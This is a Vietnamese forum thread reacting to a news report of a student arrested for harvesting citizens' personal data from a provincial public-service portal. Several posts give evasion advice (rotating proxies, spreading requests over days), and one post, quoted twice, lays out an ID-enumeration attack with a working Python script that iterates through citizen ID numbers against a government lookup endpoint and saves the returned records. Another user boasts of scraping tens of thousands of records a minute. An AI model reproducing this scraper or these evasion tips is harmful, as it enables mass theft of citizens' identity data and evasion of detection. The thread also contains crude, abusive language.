Sanh diên IT xâm nhập cổng dịch vụ công, đánh cắp hàng triệu thông tin cá nhân theo đơn đặt hàng

Điền Bá Quang 4.0

Điền Bá Quang 4.0

Địt Bùng Đạo Tổ
Trần Quang Huy còn nhiều lần xâm nhập trái phép vào cơ sở dữ liệu của các cơ quan nhà nước, đánh cắp hàng chục triệu dữ liệu công dân như thông tin BHXH, biển số xe, điện lực, vắc xin, thuê bao di động...
25.3.2025, Huy sử dụng proxy ẩn danh để xâm nhập vào Cổng dịch vụ công tỉnh Hà Tĩnh và thiết lập chuỗi lệnh tự động bằng ngôn ngữ PHP, tiến hành tra cứu trái phép dữ liệu đến sáng hôm sau. Kết quả, hơn 7.200 bản ghi chứa thông tin cá nhân của công dân – từ họ tên, số định danh, địa chỉ đến nhóm máu – bị đánh cắp. Quá trình truy vấn của Huy vượt hơn 12.000 lượt, gấp nhiều lần mức truy cập được cấp cho tỉnh Hà Tĩnh.


Tạm giam sinh viên IT xâm nhập cổng dịch vụ công, đánh cắp hàng triệu thông tin cá nhân

Sinh viên IT Trần Quang Huy bị bắt do xâm nhập trái phép hệ thống dữ liệu quốc gia, đánh cắp thông tin cá nhân để trục lợi bất chính. Ảnh: Công an Hà Tĩnh
 
Điền Bá Quang 4.0:
Trần Quang Huy còn nhiều lần xâm nhập trái phép vào cơ sở dữ liệu của các cơ quan nhà nước, đánh cắp hàng chục triệu dữ liệu công dân như thông tin BHXH, biển số xe, điện lực, vắc xin, thuê bao di động...
25.3.2025, Huy sử dụng proxy ẩn danh để xâm nhập vào Cổng dịch vụ công tỉnh Hà Tĩnh và thiết lập chuỗi lệnh tự động bằng ngôn ngữ PHP, tiến hành tra cứu trái phép dữ liệu đến sáng hôm sau. Kết quả, hơn 7.200 bản ghi chứa thông tin cá nhân của công dân – từ họ tên, số định danh, địa chỉ đến nhóm máu – bị đánh cắp. Quá trình truy vấn của Huy vượt hơn 12.000 lượt, gấp nhiều lần mức truy cập được cấp cho tỉnh Hà Tĩnh.


Tạm giam sinh viên IT xâm nhập cổng dịch vụ công, đánh cắp hàng triệu thông tin cá nhân

Sinh viên IT Trần Quang Huy bị bắt do xâm nhập trái phép hệ thống dữ liệu quốc gia, đánh cắp thông tin cá nhân để trục lợi bất chính. Ảnh: Công an Hà Tĩnh
Bấm để mở rộng...
Cặc thawngd công ăn thì béo tốt mà cái phòng rỉ sét vl
 
marcusaurelius1991:
Sao hack được với PHP vậy các tml
Bấm để mở rộng...
Viết API tool tự động gửi request lên cổng dịch vụ công, t nhớ cccd 12 chữ thì hết 3 chữ đầu là mã tỉnh cmnr, sau đó là số năm sinh còn 6 số thì chỉ việc chạy từ 0 tới 1triêụ là xong , lâu lâu lại đổi proxy, mà thằng ngu này tự nhiên lại request tất cả trong 1 đêm lưu lượng truy cập bất thường nó lại chả nghi, đáng lẽ phải chia ra nhiều ngày
 
seeingmachines:
Viết API tool tự động gửi request lên cổng dịch vụ công, t nhớ cccd 12 chữ thì hết 3 chữ đầu là mã tỉnh cmnr, sau đó là số năm sinh còn 6 số thì chỉ việc chạy từ 0 tới 1triêụ là xong , lâu lâu lại đổi proxy, mà thằng ngu này tự nhiên lại request tất cả trong 1 đêm lưu lượng truy cập bất thường nó lại chả nghi, đáng lẽ phải chia ra nhiều ngày
Bấm để mở rộng...
nó có mở api đâu mà crawl kiểu đó
do phương thức bảo mật
Điền Bá Quang 4.0:
xâm nhập vào Cổng dịch vụ công tỉnh Hà Tĩnh và thiết lập chuỗi lệnh tự động bằng ngôn ngữ PHP, tiến hành tra cứu trái phép dữ liệu đến sáng hôm sau. Kết
Bấm để mở rộng...
vậy do bọn hà tĩnh ngu Lồn r
crawl thì qua vài lớp proxy vps sao biết đc
 
Thông tin cũ lộ hết con mẹ nó rồi còn đâu, lúc trước xài con bot moon trên telegram nhập sdt nó trả về full họ tên địa chỉ. Giờ lòi ra thêm vụ này coi bộ thông tin mới cũng lộ sạch.
 
dungdamchemnhau:
gFNFq8.jpeg
Bấm để mở rộng...
Điều đáng chú ý: đối tượng là sinh viên, chưa có dấu hiệu là hacker chuyên nghiệp hay dùng mã độc cao cấp — điều đó khiến kỹ thuật sử dụng khả năng cao là "sơ cấp", nhưng lại rất hiệu quả nếu hệ thống bảo mật yếu.
Các kỹ thuật khả dĩ
1. Khai thác API mở (Open API Exploitation) – khả năng rất cao
Đây là phương thức phổ biến và phù hợp với một sinh viên IT có kỹ năng lập trình cơ bản.
Nếu cổng dịch vụ công có API (giao diện lập trình ứng dụng) để truy vấn dữ liệu (ví dụ: tra cứu thông tin công dân theo mã số định danh), và nếu API đó không có xác thực hoặc giới hạn truy cập, thì hacker có thể viết script tự động để dò hàng loạt số định danh và thu thập dữ liệu trả về.
Kỹ thuật sử dụng:
Viết script Python/PHP để gửi yêu cầu GET/POST hàng loạt.
Tăng tốc độ dò bằng đa luồng (multi-threading).
Không cần xâm nhập máy chủ, chỉ cần tận dụng sai sót trong thiết kế hệ thống.
2. Tấn công Brute-force hoặc Enumeration qua form tìm kiếm công khai
Nhiều hệ thống dịch vụ công cho phép người dân tra cứu thông tin bằng số CCCD/Mã hồ sơ. Nếu không có captcha, giới hạn truy cập hoặc mã hóa dữ liệu đầu ra, hacker có thể:
Viết công cụ quét dải số CCCD.
Ghi lại toàn bộ dữ liệu trả về.
Khả năng cao nhất là sinh viên này sử dụng kỹ thuật tự động truy vấn API hoặc form công khai không được bảo vệ, để dò quét và trích xuất dữ liệu cá nhân trên cổng dịch vụ công.
Đây là một bài học lớn cho các cơ quan nhà nước, bởi vì lỗi không nằm ở kỹ thuật cao siêu của tin tặc, mà là ở thiết kế hệ thống cẩu thả, thiếu biện pháp giới hạn và xác thực bảo vệ dữ liệu.
 
KỸ THUẬT KHAI THÁC API MỞ
Giả sử hệ thống cổng dịch vụ công có tính năng cho phép người dân tra cứu thông tin công dân bằng cách nhập số CCCD hoặc mã định danh cá nhân. Khi nhập số và nhấn "Tìm kiếm", hệ thống gửi một truy vấn tới API:

Ví dụ (giả định):

nginx
Sao chép
Chỉnh sửa
GET https://dichvucong.gov.vn/api/tra-cuu?cccd=012345678901
Kết quả trả về (JSON):

json
{
"status": "success",
"data": {
"hoTen": "Nguyen Van A",
"ngaySinh": "1999-05-10",
"diaChi": "Xóm 3, xã A, huyện B, tỉnh C",
"soDienThoai": "098xxxxxxx"
}
}
Nếu API không yêu cầu token, không giới hạn truy cập, và không có cơ chế kiểm soát số lần truy vấn, thì hacker có thể khai thác như sau.
Ví dụ đoạn mã Python sử dụng requests:

python

import requests
import time
import json

def scan_cccd(start, end):
for cccd in range(start, end):
cccd_str = str(cccd).zfill(12) # CCCD đủ 12 số
url = f"https://dichvucong.gov.vn/api/tra-cuu?cccd={cccd_str}"
try:
response = requests.get(url)
if response.status_code == 200 and "data" in response.text:
data = response.json()
print(f" {cccd_str}: {data['data']}")
with open("data.txt", "a", encoding="utf-8") as f:
f.write(json.dumps(data["data"]) + "\n")
else:
print(f" {cccd_str}: Không có dữ liệu")
except Exception as e:
print(f" Lỗi khi xử lý CCCD {cccd_str}: {e}")
time.sleep(0.5) # delay để tránh bị chặn

# Khởi động quét từ số 001000000000 đến 001000010000 (10.000 bản ghi)
scan_cccd(100000000000, 100000010000)
Kết quả:
Hacker có thể thu thập hàng ngàn đến hàng triệu bản ghi chỉ trong vài giờ hoặc vài ngày nếu không bị chặn.

Nếu dùng đa luồng hoặc máy chủ cloud, tốc độ còn nhanh hơn.
 
Dautroc_thichcungduong:
KỸ THUẬT KHAI THÁC API MỞ
Giả sử hệ thống cổng dịch vụ công có tính năng cho phép người dân tra cứu thông tin công dân bằng cách nhập số CCCD hoặc mã định danh cá nhân. Khi nhập số và nhấn "Tìm kiếm", hệ thống gửi một truy vấn tới API:

Ví dụ (giả định):

nginx
Sao chép
Chỉnh sửa
GET https://dichvucong.gov.vn/api/tra-cuu?cccd=012345678901
Kết quả trả về (JSON):

json
{
"status": "success",
"data": {
"hoTen": "Nguyen Van A",
"ngaySinh": "1999-05-10",
"diaChi": "Xóm 3, xã A, huyện B, tỉnh C",
"soDienThoai": "098xxxxxxx"
}
}
Nếu API không yêu cầu token, không giới hạn truy cập, và không có cơ chế kiểm soát số lần truy vấn, thì hacker có thể khai thác như sau.
Ví dụ đoạn mã Python sử dụng requests:

python

import requests
import time
import json

def scan_cccd(start, end):
for cccd in range(start, end):
cccd_str = str(cccd).zfill(12) # CCCD đủ 12 số
url = f"https://dichvucong.gov.vn/api/tra-cuu?cccd={cccd_str}"
try:
response = requests.get(url)
if response.status_code == 200 and "data" in response.text:
data = response.json()
print(f" {cccd_str}: {data['data']}")
with open("data.txt", "a", encoding="utf-8") as f:
f.write(json.dumps(data["data"]) + "\n")
else:
print(f" {cccd_str}: Không có dữ liệu")
except Exception as e:
print(f" Lỗi khi xử lý CCCD {cccd_str}: {e}")
time.sleep(0.5) # delay để tránh bị chặn

# Khởi động quét từ số 001000000000 đến 001000010000 (10.000 bản ghi)
scan_cccd(100000000000, 100000010000)
Kết quả:
Hacker có thể thu thập hàng ngàn đến hàng triệu bản ghi chỉ trong vài giờ hoặc vài ngày nếu không bị chặn.

Nếu dùng đa luồng hoặc máy chủ cloud, tốc độ còn nhanh hơn.
Bấm để mở rộng...
viết code bằng js chạy luôn trên console của trình duyệt chứ cần gì viết python cho nó phức tạp
 
Dautroc_thichcungduong:
Hacker có thể thu thập hàng ngàn đến hàng triệu bản ghi chỉ trong vài giờ hoặc vài ngày nếu không bị chặn.

Nếu dùng đa luồng hoặc máy chủ cloud, tốc độ còn nhanh hơn.
Bấm để mở rộng...
gpt hả
t dùng api 1 phút cào vài chục ngàn data r
 
Sửa lần cuối:
Đăng nhập hoặc Ghi danh để trả lời

Có thể bạn quan tâm

ruataito
Hạt kiểm lâm nói gì về việc chùa Linh Ứng treo biển: 'Không nên phóng sanh rùa'?
Trả lời
1
Lượt xem
116
Olineasdf
Olineasdf
Hoàng Tử DiNa
🔴 Múi mít được mệnh danh là "Em bé thiên niên kỷ' sanh ngày 1/1/2000 của Trung cộng đột tử ở tuổi 25
Trả lời
13
Lượt xem
504
hirota
hirota
Điền Bá Quang 4.0
[Kinh hoàng] 2 đối tượng chọc phá vợ của 🐃 Lái Xe mới sanh con, bị xiên thủng bụng, rất nguy kịch
Trả lời
14
Lượt xem
833
philong2024august
philong2024august
newboi
Bộ trưởng Công thương Nguyễn Hồng Diên họp kín với đại diện SpaceX, Google, Lockheed Martin và Excelerate Energy
Trả lời
0
Lượt xem
107
newboi
newboi
Bơ thừa sữa cặn
Bác Diên nói đàm phán thuế đối ứng với Mỹ đế đạt tiến bộ tích cực. Xammer cứ tin ở bác!
Trả lời
1
Lượt xem
99
user@135
user@135
khoangkhacniemvui
Cuộc đối thoại đặc biệt của Thủ tướng với doanh nhân giữa Diên Hồng
Trả lời
5
Lượt xem
252
Manh Dao
Manh Dao
C
Bộ trưởng Bộ Công Thương, Trưởng đoàn đàm phán Chính phủ Nguyễn Hồng Diên điện đàm với Trưởng Đại diện Thương mại Hoa Kỳ Jamieson L. Greer
Trả lời
1
Lượt xem
98
xamlolol
X
Top